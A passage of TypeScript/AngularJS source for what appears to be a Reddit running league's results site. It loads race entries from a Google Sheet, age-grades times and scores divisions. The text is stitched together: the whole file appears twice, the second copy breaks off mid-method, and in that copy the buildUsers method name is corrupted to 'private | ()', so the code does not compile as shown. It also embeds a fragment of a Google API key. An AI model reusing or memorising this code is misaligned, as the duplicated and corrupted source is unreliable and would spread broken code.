user: string;
link: string;
age: number;
sex: Sex;
division: string;
results: MUserEventResult[];
}
interface MUserEventResult {
event: string;
times: MUserRaceResult[];
}
interface MUserRaceResult {
username: string;
race: string;
time: string;
time_number: number;
age_graded_time: string;
age_graded_time_number: number;
percent_world_record: number;
note: string;
sex: Sex;
links: MLink[];
place: number;
points: number;
division: string;
}
interface MDivision {
name: string;
users: Array<MUser>;
}
interface MDivisionRaceResult {
name: string;
race: string;
points: number;
athletes: number;
note: string;
place: number;
}
interface MLink {
type: string;
url: string;
favicon: string;
}
interface BreadCrumb {
name: string;
last: boolean;
link?: string;
}
let BASE = 'https://jgr3go.github.io/reddit_ar/mooseleague/';
if (window.location.href.match(/localhost/)) {
BASE = '';
}
let GAPI = new Promise((resolve, reject) => {
gapi.load('client', {
callback: async () => {
// this isn't great, but the apikey should be limited to very specific things
await gapi.client.init({apiKey: `${byx}1XThhfQZLh6YcTKwLz${lmw}`});
resolve();
}
});
});
function isMobile() {
return !!(navigator.userAgent.match(/Android/i) ||
navigator.userAgent.match(/webOS/i) ||
navigator.userAgent.match(/iPhone/i) ||
navigator.userAgent.match(/iPad/i) ||
navigator.userAgent.match(/iPod/i) ||
navigator.userAgent.match(/BlackBerry/i) ||
navigator.userAgent.match(/Windows Phone/i));
}
function stripDivision(div: string) {
if (div.includes("(")) {
return div.substr(0, div.indexOf("("));
}
return div;
}
/**
* Loads google sheet and does most of the processing into raw data objects
*/
class GoogleSvc {
private spreadsheet: gapi.client.sheets.Spreadsheet;
private Events: Array<MEvent> = [];
private Users: Array<MUser> = [];
private Divisions: Array<MDivision> = [];
private built: boolean = false;
private loading: Promise<any>;
public USER_COLUMNS = {
TIMESTAMP: 0,
USERNAME: 1,
DIVISION: 2,
AGE: 3,
SEX: 4,
RESULT: 5,
NOTES: 6,
LINKS: 7
};
private async ready() {
if (this.loading) { return await this.loading; }
this.loading = new Promise(async (resolve, reject) => {
try {
await GAPI;
await gapi.client.load('sheets', 'v4');
let sheet = await gapi.client.sheets.spreadsheets.get({
spreadsheetId: '1ZC7pDg9VRiqnd4-w15LUSWcvQXti62IOSp0dcYj2JZI',
includeGridData: true
});
console.log(sheet.result);
this.spreadsheet = sheet.result;
resolve();
} catch (e) {
reject(e);
}
});
}
async load() {
await this.getSpreadsheet();
}
private async getSpreadsheet(): Promise<gapi.client.sheets.Spreadsheet> {
if (this.spreadsheet) { return this.spreadsheet; }
await this.ready();
return this.spreadsheet;
}
private async build() {
if (this.built) { return; }
await this.getSpreadsheet();
this.buildEvents();
this.buildUsers();
this.buildDivisions();
this.mergeEventsUsers();
this.built = true;
}
private buildEvents() {
let events: MEvent[] = [];
for (let sheet of this.spreadsheet.sheets) {
let evt: MEvent = <MEvent>{};
evt.name = sheet.properties.title;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!row.values[1]?.formattedValue) { continue; }
switch (row.values[0]?.formattedValue) {
case 'Event':
evt.events = row.values[1]?.formattedValue;
break;
case 'Date':
evt.date = moment(row.values[1]?.formattedValue).year(moment().year());
evt.displayDate = moment(evt.date).format('MMM D, YYYY');
break;
case 'Results':
evt.link = row.values[1]?.formattedValue;
break;
case 'Form':
evt.submit = row.values[1]?.formattedValue;
break;
default:
break;
}
evt.state = evt.name;
evt.url = `/${ evt.name.split(' ').join('').toLowerCase()}`;
evt.editLink = `${this.spreadsheet.spreadsheetUrl}#gid=${sheet.properties.sheetId}`;
evt.results = evt.events.split(',').map(e => {
return {
race: e,
divisions: [],
times: []
};
});
}
events.push(evt);
}
this.Events = events;
}
private buildUsers() {
let users: MUser[] = [];
let COL = this.USER_COLUMNS;
for (let sheet of this.spreadsheet.sheets) {
let eventName = sheet.properties.title;
let raceName: string;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
let startUserRows = false;
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!startUserRows) {
if (row.values[0]?.formattedValue == 'Event') {
raceName = row.values[1]?.formattedValue;
}
if (row.values[COL.USERNAME]?.formattedValue == 'Username') {
startUserRows = true;
}
} else {
let username = row.values[COL.USERNAME]?.formattedValue || "";
if (!username) { break; }
// first time finding user, add to master list
if (!users.find(u => u.user.toLowerCase() == username.toLowerCase())) {
let user: Partial<MUser> = {
user: username,
division: stripDivision(row.values[COL.DIVISION]?.formattedValue || ""),
age: parseInt(row.values[COL.AGE]?.formattedValue) || null,
sex: <Sex>row.values[COL.SEX]?.formattedValue?.substr(0,1).toUpperCase(),
results: []
};
user.link = `https://reddit.com/u/${user.user}`;
users.push(<MUser>user);
}
let user = users.find(u => u.user.toLowerCase() == username.toLowerCase());
let time = row.values[COL.RESULT]?.formattedValue;
if (time?.substr(0, 1) == "'") {
time = time.substr(1);
}
user.results.push({
event: eventName,
times: raceName.split(',').map(r => {
return <MUserRaceResult>{
race: r,
username: user.user,
division: user.division,
sex: user.sex,
time: time,
note: row.values[COL.NOTES]?.formattedValue,
links: row.values[COL.LINKS]?.formattedValue?.split(',').map(link => {
return <MLink>{
type: this.getLinkType(link),
favicon: this.getFavicon(link),
url: link
}
})
};
})
});
}
}
}
this.Users = users;
}
private getLinkType(link: string) {
if (link.match(/strava/)) { return 'strava'; }
if (link.match(/youtu/)) { return 'youtube'; }
if (link.match(/redd/)) { return 'reddit'; }
return '';
}
private getFavicon(link: string) {
let match = link.match(/(https?\:\/\/[^\/]+)/);
if (!match) { return 'https://google.com/favicon.ico'; }
let root = match[1].trim();
if (root.substr(0, 4) != "http") {
root = `http://${root}`;
}
return `${root}/favicon.ico`;
}
private buildDivisions() {
let divisions: MDivision[] = [];
for (let user of this.Users) {
if (!divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase())) {
divisions.push({
name: user.division,
users: []
});
}
let division = divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase());
division.users.push(user);
}
}
private mergeEventsUsers() {
// first merge any events into the users
for (let evt of this.Events) {
for (let user of this.Users) {
// add DNS events to every user for events they didn't do
if (!user.results.find(r => r.event.toLowerCase() == evt.name.toLowerCase())) {
user.results.push({
event: evt.name,
times: evt.events.split(',').map(race => (<MUserRaceResult>{
race: race,
username: user.user,
division: user.division,
note: 'DNS'
}))
})
}
}
}
// then merge user results into the events
for (let user of this.Users) {
for (let result of user.results) {
let evt = this.Events.find(e => e.name.toLowerCase() == result.event.toLowerCase());
if (evt) {
for (let time of result.times) {
let evtResult = evt.results.find(r => r.race.toLowerCase() == time.race.toLowerCase());
evtResult.times.push(time);
if (!evtResult.divisions.find(d => d.race.toLowerCase() == time.race.toLowerCase()
&& d.name.toLowerCase() == time.division.toLowerCase()))
{
evtResult.divisions.push({
name: time.division,
race: time.race,
points: null,
athletes: 0,
note: null,
place: null
});
}
}
}
}
}
}
async listEvents(): Promise<MEvent[]> {
await this.build();
return this.Events;
}
async listUsers(): Promise<MUser[]> {
await this.build();
return this.Users;
}
async listDivisions(): Promise<MDivision[]> {
await this.build();
return this.Divisions;
}
}
/**
* Container for the events, logic for what's next etc
*/
class Events {
static $inject = ['$http', '$q', 'Google'];
private events: Array<MEvent> = [];
constructor(public $http: angular.IHttpService,
public $q: angular.IQService,
public google: GoogleSvc) { }
async list(): Promise<Array<MEvent>> {
if (this.events && this.events.length) { return this.events; }
this.events = await this.google.listEvents();
this.events = _.orderBy(this.events, e => e.date);
return this.events;
}
async get(eventName: string): Promise<MEvent> {
let events = await this.list();
return events.find(x => x.name.replace(/\s+/g, '').toLowerCase() == eventName.replace(/\s+/g, '').toLowerCase());
}
async latest() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
if (events[events.length- 2]) {
let date = moment(events[events.length - 2].date).format('YYYY-MM-DD');
if (moment().format('YYYY-MM-DD') == date) {
return events[events.length - 2];
}
}
return events[events.length - 1];
}
async next() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
let active = events.find(e => !!e.submit);
if (active) { return active; }
let next = events[events.length - 1];
for (let ii = events.length - 1; ii >= 0; ii--) {
if (moment(events[ii].date) >= moment().startOf('day')) {
next = events[ii];
}
}
return next;
}
}
/**
* Container for users, logic for age grading etc
*/
class Users {
users: MUser[] = [];
static $inject = ['Google', 'TimeService', 'AgeService'];
constructor(public google: GoogleSvc, public timeSvc: TimeService, public ageSvc: AgeService) {}
async list() {
if (this.users.length) { return this.users; }
this.users = await this.google.listUsers();
for (let user of this.users) {
for (let result of user.results) {
for (let time of result.times) {
time.time_number = this.timeSvc.toNumber(time.time);
time.age_graded_time_number = this.ageSvc.ageGrade(time.race, user.age, user.sex, time.time_number, user.user);
time.age_graded_time = this.timeSvc.toString(time.age_graded_time_number);
time.percent_world_record = this.ageSvc.percentGrade(time.race, user.sex, time.age_graded_time_number, user.user);
}
}
}
return this.users;
}
}
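// Users.list() enrichment sketch: every raw time is decorated with time_number (seconds), the
// age-graded seconds and string, and percent_world_record; Results.score() later ranks finishers by
// that percentage before falling back to raw time and username.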
/**
* Container for divisions
*/
class Divisions {
divisions: MDivision[] = [];
static $inject = ['Google'];
constructor(private google: GoogleSvc) {}
async list() {
if (this.divisions.length) { return this.divisions; }
this.divisions = await this.google.listDivisions();
return this.divisions;
}
}
/**
* Does the bulk of the calculations for results, division grouping and scoring
*/
class Results {
results: MEvent[];
static $inject = ['Events', 'Users', 'Divisions'];
constructor(private Events: Events,
private Users: Users,
private Divisions: Divisions) {}
async calculate() {
if (this.results) { return this.results; }
let events = await this.Events.list();
let users = await this.Users.list();
let divisions = await this.Divisions.list();
this.score(events);
console.log({events})
this.results = events;
return this.results;
}
score(events: MEvent[]) {
for (let event of events) {
for (let race of event.results) {
let divs = _.keyBy(race.divisions, d => d.name.toLowerCase());
race.times = _.orderBy(race.times, [t => t.percent_world_record, t => t.time_number, t => t.username], ['desc', 'asc', 'asc']);
let place = 1;
for (let time of race.times) {
if (time.time) {
time.place = place++;
let divname = time.division.toLowerCase();
divs[divname].athletes += 1;
if (divs[divname].athletes <= 5) {
time.points = time.place;
divs[divname].points += time.place;
}
}
else {
time.points = null;
}
}
race.divisions = _.orderBy(race.divisions, [d => d.athletes >= 5 ? -1 : 1, d => d.points]);
place = 1;
for (let div of race.divisions) {
if (div.athletes >= 5) {
div.place = place++;
} else {
div.note = "DQ (Not enough finishers)";
}
}
}
}
}
async getEventResults(name: string) {
await this.calculate();
return this.results.find(x => x.name.replace(/\s+/g, '').toLowerCase() == name.replace(/\s+/g, '').toLowerCase());
}
}
/**
* Default page calendar view
*/
class Calendar {
static $inject = ['$http', 'Events'];
events: Array<MEvent> = [];
constructor (public $http: angular.IHttpService, public Events: Events) {
this.init();
}
async init() {
this.events = [];
let evts = await this.Events.list();
for (let evt of evts) {
evt = _.clone(evt);
evt.date = moment(evt.date).format('MMM D, YYYY');
this.events.push(evt);
}
}
}
/**
* Main controller loaded at start
*/
class MainController {
public isMobile: boolean;
public autoplay: boolean;
public events: Array<MEvent> = [];
public next: MEvent;
public autoplayKey: string;
public lastState: string;
public crumbs: BreadCrumb[] = [];
static $inject = ['$http', '$location', '$timeout', '$state', 'Events', '$sce'];
constructor(public $http: angular.IHttpService,
public $location: angular.ILocationService,
public $timeout: angular.ITimeoutService,
public $state: ng.ui.IStateService,
public Events: Events,
public $sce: angular.ISCEService)
{
this.autoplay = localStorage.getItem('autoplay2020') === null ? true : localStorage.getItem('autoplay2020') == 'true';
this.isMobile = isMobile();
this.autoplayKey = 'autoplay' + moment().year();
this.init();
}
async init() {
let [evts, evt] = await Promise.all([this.Events.list(), this.Events.next()]);
this.events = evts;
this.next = <MEvent>{
name: evt.name.toUpperCase(),
date: moment(evt.date),
state: evt.state,
displayDate: moment(evt.date).format('MMM D, YYYY'),
submit: evt.submit,
live: false
};
this.countdown();
}
countdown() {
if (this.next) {
let now = moment();
let evt = moment(this.next.date);
if (now.format('YYYY-MM-DD') === evt.format('YYYY-MM-DD')) {
this.next.live = true;
} else if (this.next.submit) {
this.next.live = true;
} else {
let days = evt.diff(now, 'days');
this.next.days = days;
evt.subtract(days, 'days');
let hours = evt.diff(now, 'hours');
this.next.hours = hours;
evt.subtract(hours, 'hours');
let minutes = evt.diff(now, 'minutes');
this.next.minutes = minutes;
}
this.$timeout(() => this.countdown(), 1000 * 60);
} else {
this.$timeout(() => this.countdown(), 500);
}
}
getBreadcrumbs() {
if (this.$state.current.name === this.lastState) {
return this.crumbs;
}
this.lastState = this.$state.current.name;
this.crumbs = [];
if (this.lastState !== 'Calendar') {
this.crumbs = [
{name: 'Home', last: false, link: 'Calendar'},
{name: this.lastState, last: true}
];
} else {
this.crumbs = [
{name: 'Home', last: true}
];
}
return this.crumbs;
}
stopAutoplay() {
localStorage.setItem(this.autoplayKey, 'false');
this.autoplay = false;
}
startAutoplay() {
localStorage.setItem(this.autoplayKey, 'true');
this.autoplay = true;
}
shouldAutoplay() {
let ap = localStorage.getItem(this.autoplayKey);
return !(ap === 'false');
}
getThemeUrl() {
let ap = this.shouldAutoplay();
return this.$sce.trustAsResourceUrl(`https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/460111206&auto_play=${ap}&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true`);
}
}
/**
* Individual event controller for event results pages
*/
class EventController {
tab: string = 'results';
hasRelay: boolean = false;
event: MEvent;
static $inject = ['$http', '$state', '$timeout', '$location', '$anchorScroll',
'$stateParams', 'Events', 'Results'];
constructor(private $http: angular.IHttpService,
private $state: ng.ui.IStateService,
private $timeout: angular.ITimeoutService,
private $location: angular.ILocationService,
private $anchorScroll: angular.IAnchorScrollService,
private $params: ng.ui.IStateParamsService,
private Events: Events,
private Results: Results)
{
this.$anchorScroll.yOffset = 60;
this.init();
}
async init() {
if (this.$params.tab) {
this.tab = this.$params.tab;
}
let eventName = this.$state.current.name;
this.event = await this.Results.getEventResults(eventName);
console.log({event: this.event});
this.$timeout(this.$anchorScroll);
}
changeTab(tab: string) {
this.tab = tab;
this.$state.go(this.$state.current.name, {tab});
}
}
/**
* AgeService
* Manages age grading calculations. Defaults to no grade.
*/
interface Grade {
id: string;
event: string;
isRoad: boolean;
mf: Sex;
age: number;
factor: number;
}
type Sex = 'F'|'M';
class AgeService {
static GRADES: {[mfEventId: string]: {[age: number]: Grade}} = {};
static COLS = {
MFEVENTID : 0,
EVENTID: 1,
ISROAD: 2,
DISTANCE_KM: 3,
WORLD_RECORD_SEC: 4,
AGE_START: 5
};
static WORLD_RECORD = 'World Record';
static parse(file: string) {
let COL = AgeService.COLS;
let lines = file.split('\n');
for (let line of lines) {
if (!line.trim()) { continue; }
let parts = line.split('\t');
if (parts[0] == 'Event') { continue; }
// set up base object
let grade: Partial<Grade> = {
event: parts[COL.EVENTID],
isRoad: parts[COL.ISROAD] == '1',
mf: <Sex>parts[COL.MFEVENTID].substr(0, 1) // first character only: 'M' or 'F'
};
let id = parts[COL.MFEVENTID];
if (!AgeService.GRADES[id]) { AgeService.GRADES[id] = {}; }
// assign world record
AgeService.GRADES[id][AgeService.WORLD_RECORD] = <Grade>Object.assign({record: parseFloat(parts[COL.WORLD_RECORD_SEC])});
// assign age groups
let START = COL.AGE_START;
for (let ii = START; ii < parts.length - 1; ii++) {
let age = ii + 1;
let factor = parseFloat(parts[ii]);
AgeService.GRADES[id][age] = <Grade>Object.assign({age, factor, id}, grade);
}
}
console.log(AgeService.GRADES)
}
ageGrade(event: string, age: number, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return seconds; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let mfEventId = `${sex}${event}`;
let gradedTime = seconds;
let factor = 1;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
if (mfEvent[age]) {
factor = mfEvent[age].factor;
gradedTime = seconds * factor;
}
}
console.log(`${username} ${mfEventId} age:${age} time:${seconds} factor:${factor} graded:${gradedTime}`)
return gradedTime;
}
percentGrade(event: string, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return 0; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let percent = 0;
let wr;
let mfEventId = `${sex}${event}`;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
wr = mfEvent[AgeService.WORLD_RECORD];
percent = wr.record / seconds;
}
console.log(`${username} ${mfEventId} time:${seconds} WR:${wr?.record} percent:${percent}`);
return percent;
}
}
/**
* TimeService
* Time calculations -> string to number / number to string
*/
class TimeService {
toString(time: number): string {
if (!time) { return null; }
let hours = Math.floor(time / (60 * 60));
time = time - (hours * 60 * 60);
let minutes = Math.floor(time / 60);
time = time - (minutes * 60);
let seconds = time.toFixed(1);
let secondsNum = time;
if (hours) {
return `${hours}:${_.padStart(minutes+'',2,'0')}:${(secondsNum < 10 ? '0' : '') + seconds}`;
} else {
return `${minutes}:${(secondsNum < 10 ? '0' : '') + seconds}`;
}
}
toNumber(time: string): number {
if (!time) { return null; }
let parts = time.split(':').map(t => parseFloat(t));
if (parts.length == 3) {
return parts[0]*60*60 + parts[1]*60 + parseFloat(''+parts[2]);
} else {
return parts[0]*60 + parseFloat(''+parts[1]);
}
}
}
function promiseFix($rootScope) {
// await fix -- runs a digest manually on await because it doesn't naturally
Promise = ((Promise) => {
const NewPromise = function (fn) {
const promise = new Promise(fn);
promise.then((value) => {
$rootScope.$applyAsync();
return value;
}, (err) => {
$rootScope.$applyAsync();
throw err;
});
return promise;
};
// Clone the prototype
NewPromise.prototype = Promise.prototype;
// Clone all writable instance properties
for (const propertyName of Object.getOwnPropertyNames(Promise)) {
const propertyDescription = Object.getOwnPropertyDescriptor(Promise, propertyName);
if (propertyDescription.writable) {
NewPromise[propertyName] = Promise[propertyName];
}
}
return NewPromise;
})(Promise) as any;
}
function preload($http, $stateRegistry, $urlRouter, Events: Events, ageSvc: AgeService, google: GoogleSvc) {
return google.load().then(() => {
return Promise.all([
Events.list()
.then(evts => {
for (let evt of evts) {
let state = {
name: evt.state,
templateUrl: `${BASE}event.html`,
controller: 'event',
url: evt.url + "?tab",
params: {
tab: {dynamic: true}
},
controllerAs: 'EC'
};
$stateRegistry.register(state);
}
// after registering states, listen on the router
$urlRouter.sync();
$urlRouter.listen();
}),
$http.get(`${BASE}age-grade.txt`)
.then(x => x.data)
.then(data => {
AgeService.parse(data);
})
]);
});
}
angular
.module('ar', ['ui.router'])
.config(['$stateProvider', '$sceDelegateProvider', '$urlRouterProvider', '$locationProvider', function ($sp, $sce, $url, $loc) {
$sce.resourceUrlWhitelist([
'self',
`${BASE}**`
]);
$url.deferIntercept();
$sp.state({
name: 'Calendar',
templateUrl: `${BASE}calendar.html`,
controller: 'calendar',
url: '/calendar',
controllerAs: 'CC'
});
$sp.state({
name: 'Leaderboard',
templateUrl: `${BASE}leaderboard.html`,
controller: 'leaderboard',
url: '/leaderboard',
controllerAs: 'LC'
});
$url.otherwise('/calendar');
}])
.run(['$rootScope', promiseFix])
.run(['$http', '$stateRegistry', '$urlRouter', 'Events', 'AgeService', 'Google', preload])
.service('Google', GoogleSvc)
.service('Events', Events)
.service('Users', Users)
.service('Divisions', Divisions)
.service('AgeService', AgeService)
.service('TimeService', TimeService)
.service('Results', Results)
.controller('calendar', Calendar)
.controller('main', MainController)
.controller('event', EventController)
.directive('fixedTop', ['$window', function ($window) {
return {
restrict: 'A',
link: function (scope, elem, attrs, ctrl) {
let $win = angular.element($window);
let fixed = parseInt(attrs.fixedTop) || 50;
$win.on('scroll', e => {
let width = Math.max(window.innerWidth, document.documentElement.clientWidth);
if (width < 550 || $window.pageYOffset < fixed) {
elem.css({position: 'relative', top: '' });
} else {
elem.css({position: 'relative', top: ($window.pageYOffset - fixed) + 'px' });
}
});
}
};
}])
.filter('percent', ['$filter', function($filter) {
return function(input, decimals = 1) {
return $filter('number')(input * 100, decimals) + '%';
};
}]);

// mooseleague_ts.ts
// to prevent this loading twice in dev - hacky hacky whatever shut your face
// if (!window['apploaded']) {
// window['apploaded'] = true;
// throw "Already loaded";
// }
declare var byx;
declare var lmw;
interface MEvent {
name: string;
url: string;
date: string|Date|moment.Moment;
state: string;
events: string;
link: string;
submit: string;
editLink: string;
displayDate: string;
live?: boolean;
days?: number;
hours?: number;
minutes?: number;
results: MEventRaceResults[];
}
interface MEventRaceResults {
race: string;
divisions: MDivisionRaceResult[];
times: MUserRaceResult[];
}
interface MUser {
user: string;
link: string;
age: number;
sex: Sex;
division: string;
results: MUserEventResult[];
}
interface MUserEventResult {
event: string;
times: MUserRaceResult[];
}
interface MUserRaceResult {
username: string;
race: string;
time: string;
time_number: number;
age_graded_time: string;
age_graded_time_number: number;
percent_world_record: number;
note: string;
sex: Sex;
links: MLink[];
place: number;
points: number;
division: string;
}
interface MDivision {
name: string;
users: Array<MUser>;
}
interface MDivisionRaceResult {
name: string;
race: string;
points: number;
athletes: number;
note: string;
place: number;
}
interface MLink {
type: string;
url: string;
favicon: string;
}
interface BreadCrumb {
name: string;
last: boolean;
link?: string;
}
let BASE = 'https://jgr3go.github.io/reddit_ar/mooseleague/';
if (window.location.href.match(/localhost/)) {
BASE = '';
}
let GAPI = new Promise((resolve, reject) => {
gapi.load('client', {
callback: async () => {
// this isn't great, but the apikey should be limited to very specific things
await gapi.client.init({apiKey: `${byx}1XThhfQZLh6YcTKwLz${lmw}`});
resolve();
}
});
});
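// Note: byx and lmw are ambient globals (declared above with `declare var`), presumably injected by
// the hosting page; the Sheets API key is assembled by concatenating them around the literal above.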
function isMobile() {
return !!(navigator.userAgent.match(/Android/i) ||
navigator.userAgent.match(/webOS/i) ||
navigator.userAgent.match(/iPhone/i) ||
navigator.userAgent.match(/iPad/i) ||
navigator.userAgent.match(/iPod/i) ||
navigator.userAgent.match(/BlackBerry/i) ||
navigator.userAgent.match(/Windows Phone/i));
}
function stripDivision(div: string) {
if (div.includes("(")) {
return div.substr(0, div.indexOf("("));
}
return div;
}
/**
* Loads google sheet and does most of the processing into raw data objects
*/
class GoogleSvc {
private spreadsheet: gapi.client.sheets.Spreadsheet;
private Events: Array<MEvent> = [];
private Users: Array<MUser> = [];
private Divisions: Array<MDivision> = [];
private built: boolean = false;
private loading: Promise<any>;
public USER_COLUMNS = {
TIMESTAMP: 0,
USERNAME: 1,
DIVISION: 2,
AGE: 3,
SEX: 4,
RESULT: 5,
NOTES: 6,
LINKS: 7
};
private async ready() {
if (this.loading) { return await this.loading; }
this.loading = new Promise(async (resolve, reject) => {
try {
await GAPI;
await gapi.client.load('sheets', 'v4');
let sheet = await gapi.client.sheets.spreadsheets.get({
spreadsheetId: '1ZC7pDg9VRiqnd4-w15LUSWcvQXti62IOSp0dcYj2JZI',
includeGridData: true
});
console.log(sheet.result);
this.spreadsheet = sheet.result;
resolve();
} catch (e) {
reject(e);
}
});
}
async load() {
await this.getSpreadsheet();
}
private async getSpreadsheet(): Promise<gapi.client.sheets.Spreadsheet> {
if (this.spreadsheet) { return this.spreadsheet; }
await this.ready();
return this.spreadsheet;
}
private async build() {
if (this.built) { return; }
await this.getSpreadsheet();
this.buildEvents();
this.buildUsers();
this.buildDivisions();
this.mergeEventsUsers();
this.built = true;
}
private buildEvents() {
let events: MEvent[] = [];
for (let sheet of this.spreadsheet.sheets) {
let evt: MEvent = <MEvent>{};
evt.name = sheet.properties.title;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!row.values[1]?.formattedValue) { continue; }
switch (row.values[0]?.formattedValue) {
case 'Event':
evt.events = row.values[1]?.formattedValue;
break;
case 'Date':
evt.date = moment(row.values[1]?.formattedValue).year(moment().year());
evt.displayDate = moment(evt.date).format('MMM D, YYYY');
break;
case 'Results':
evt.link = row.values[1]?.formattedValue;
break;
case 'Form':
evt.submit = row.values[1]?.formattedValue;
break;
default:
break;
}
evt.state = evt.name;
evt.url = `/${ evt.name.split(' ').join('').toLowerCase()}`;
evt.editLink = `${this.spreadsheet.spreadsheetUrl}#gid=${sheet.properties.sheetId}`;
evt.results = evt.events.split(',').map(e => {
return {
race: e,
divisions: [],
times: []
};
});
}
events.push(evt);
}
this.Events = events;
}
private | () {
let users: MUser[] = [];
let COL = this.USER_COLUMNS;
for (let sheet of this.spreadsheet.sheets) {
let eventName = sheet.properties.title;
let raceName: string;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
let startUserRows = false;
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!startUserRows) {
if (row.values[0]?.formattedValue == 'Event') {
raceName = row.values[1]?.formattedValue;
}
if (row.values[COL.USERNAME]?.formattedValue == 'Username') {
startUserRows = true;
}
} else {
let username = row.values[COL.USERNAME]?.formattedValue || "";
if (!username) { break; }
// first time finding user, add to master list
if (!users.find(u => u.user.toLowerCase() == username.toLowerCase())) {
let user: Partial<MUser> = {
user: username,
division: stripDivision(row.values[COL.DIVISION]?.formattedValue || ""),
age: parseInt(row.values[COL.AGE]?.formattedValue) || null,
sex: <Sex>row.values[COL.SEX]?.formattedValue?.substr(0,1).toUpperCase(),
results: []
};
user.link = `https://reddit.com/u/${user.user}`;
users.push(<MUser>user);
}
let user = users.find(u => u.user.toLowerCase() == username.toLowerCase());
let time = row.values[COL.RESULT]?.formattedValue;
if (time?.substr(0, 1) == "'") {
time = time.substr(1);
}
user.results.push({
event: eventName,
times: raceName.split(',').map(r => {
return <MUserRaceResult>{
race: r,
username: user.user,
division: user.division,
sex: user.sex,
time: time,
note: row.values[COL.NOTES]?.formattedValue,
links: row.values[COL.LINKS]?.formattedValue?.split(',').map(link => {
return <MLink>{
type: this.getLinkType(link),
favicon: this.getFavicon(link),
url: link
}
})
};
})
});
}
}
}
this.Users = users;
}
private getLinkType(link: string) {
if (link.match(/strava/)) { return 'strava'; }
if (link.match(/youtu/)) { return 'youtube'; }
if (link.match(/redd/)) { return 'reddit'; }
return '';
}
private getFavicon(link: string) {
let match = link.match(/(https?\:\/\/[^\/]+)/);
if (!match) { return 'https://google.com/favicon.ico'; }
let root = match[1].trim();
if (root.substr(0, 4) != "http") {
root = `http://${root}`;
}
return `${root}/favicon.ico`;
}
private buildDivisions() {
let divisions: MDivision[] = [];
for (let user of this.Users) {
if (!divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase())) {
divisions.push({
name: user.division,
users: []
});
}
let division = divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase());
division.users.push(user);
}
}
private mergeEventsUsers() {
// first merge any events into the users
for (let evt of this.Events) {
for (let user of this.Users) {
// add DNS events to every user for events they didn't do
if (!user.results.find(r => r.event.toLowerCase() == evt.name.toLowerCase())) {
user.results.push({
event: evt.name,
times: evt.events.split(',').map(race => (<MUserRaceResult>{
race: race,
username: user.user,
division: user.division,
note: 'DNS'
}))
})
}
}
}
// then merge user results into the events
for (let user of this.Users) {
for (let result of user.results) {
let evt = this.Events.find(e => e.name.toLowerCase() == result.event.toLowerCase());
if (evt) {
for (let time of result.times) {
let evtResult = evt.results.find(r => r.race.toLowerCase() == time.race.toLowerCase());
evtResult.times.push(time);
if (!evtResult.divisions.find(d => d.race.toLowerCase() == time.race.toLowerCase()
&& d.name.toLowerCase() == time.division.toLowerCase()))
{
evtResult.divisions.push({
name: time.division,
race: time.race,
points: null,
athletes: 0,
note: null,
place: null
});
}
}
}
}
}
}
async listEvents(): Promise<MEvent[]> {
await this.build();
return this.Events;
}
async listUsers(): Promise<MUser[]> {
await this.build();
return this.Users;
}
async listDivisions(): Promise<MDivision[]> {
await this.build();
return this.Divisions;
}
}
/**
* Container for the events, logic for what's next etc
*/
class Events {
static $inject = ['$http', '$q', 'Google'];
private events: Array<MEvent> = [];
constructor(public $http: angular.IHttpService,
public $q: angular.IQService,
public google: GoogleSvc) { }
async list(): Promise<Array<MEvent>> {
if (this.events && this.events.length) { return this.events; }
this.events = await this.google.listEvents();
this.events = _.orderBy(this.events, e => e.date);
return this.events;
}
async get(eventName: string): Promise<MEvent> {
let events = await this.list();
return events.find(x => x.name.replace(/\s+/g, '').toLowerCase() == eventName.replace(/\s+/g, '').toLowerCase());
}
async latest() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
if (events[events.length- 2]) {
let date = moment(events[events.length - 2].date).format('YYYY-MM-DD');
if (moment().format('YYYY-MM-DD') == date) {
return events[events.length - 2];
}
}
return events[events.length - 1];
}
async next() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
let active = events.find(e => !!e.submit);
if (active) { return active; }
let next = events[events.length - 1];
for (let ii = events.length - 1; ii >= 0; ii--) {
if (moment(events[ii].date) >= moment().startOf('day')) {
next = events[ii];
}
}
return next;
}
}
/**
* Container for users, logic for age grading etc
*/
class Users {
users: MUser[] = [];
static $inject = ['Google', 'TimeService', 'AgeService'];
constructor(public google: GoogleSvc, public timeSvc: TimeService, public ageSvc: AgeService) {}
async list() {
if (this.users.length) { return this.users; }
this.users = await this.google.listUsers();
for (let user of this.users) {
for (let result of user.results) {
for (let time of result.times) {
time.time_number = this.timeSvc.toNumber(time.time);
time.age_graded_time_number = this.ageSvc.ageGrade(time.race, user.age, user.sex, time.time_number, user.user);
time.age_graded_time = this.timeSvc.toString(time.age_graded_time_number);
time.percent_world_record = this.ageSvc.percentGrade(time.race, user.sex, time.age_graded_time_number, user.user);
}
}
}
return this.users;
}
}
/**
* Container for divisions
*/
class Divisions {
divisions: MDivision[] = [];
static $inject = ['Google'];
constructor(private google: GoogleSvc) {}
async list() {
if (this.divisions.length) { return this.divisions; }
this.divisions = await this.google.listDivisions();
return this.divisions;
}
}
/**
* Does the bulk of the calculations for results, division grouping and scoring
*/
class Results {
results: MEvent[];
static $inject = ['Events', 'Users', 'Divisions'];
constructor(private Events: Events,
private Users: Users,
private Divisions: Divisions) {}
async calculate() {
